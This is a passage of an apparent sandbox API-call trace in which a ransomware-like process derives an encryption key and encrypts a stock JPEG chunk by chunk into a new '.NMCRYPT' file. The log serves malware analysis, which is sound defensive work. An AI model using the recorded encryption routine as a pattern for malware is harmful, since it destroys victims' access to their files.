CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.529] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.529] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.530] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0165.530] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.530] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad478) returned 1 [0165.530] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.530] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.530] wcslen (_String="\\\\?\\") returned 0x4 [0165.530] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad838) returned 1 [0165.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.530] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4734) returned 1 [0165.533] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.533] GetLastError () returned 0x0 [0165.533] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.535] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.535] GetLastError () returned 0x0 [0165.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.535] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.535] GetLastError () returned 0x0 [0165.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.535] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.535] GetLastError () returned 0x0 [0165.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.535] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.535] GetLastError () returned 0x0 [0165.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.535] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.535] GetLastError () returned 0x0 [0165.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.535] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.535] GetLastError () returned 0x0 [0165.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.536] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.536] GetLastError () returned 0x0 [0165.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.536] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.536] GetLastError () returned 0x0 [0165.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.536] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.536] GetLastError () returned 0x0 [0165.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.536] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.536] GetLastError () returned 0x0 [0165.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.536] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.536] GetLastError () returned 0x0 [0165.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.536] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.536] GetLastError () returned 0x0 [0165.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.537] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.537] GetLastError () returned 0x0 [0165.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.537] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.537] GetLastError () returned 0x0 [0165.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.537] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.537] GetLastError () returned 0x0 [0165.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.537] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.537] GetLastError () returned 0x0 [0165.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.537] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.537] GetLastError () returned 0x0 [0165.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x7e, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x7e, lpOverlapped=0x0) returned 1 [0165.537] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x7e, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x80) returned 1 [0165.537] GetLastError () returned 0x0 [0165.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x80, lpOverlapped=0x0) returned 1 [0165.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, 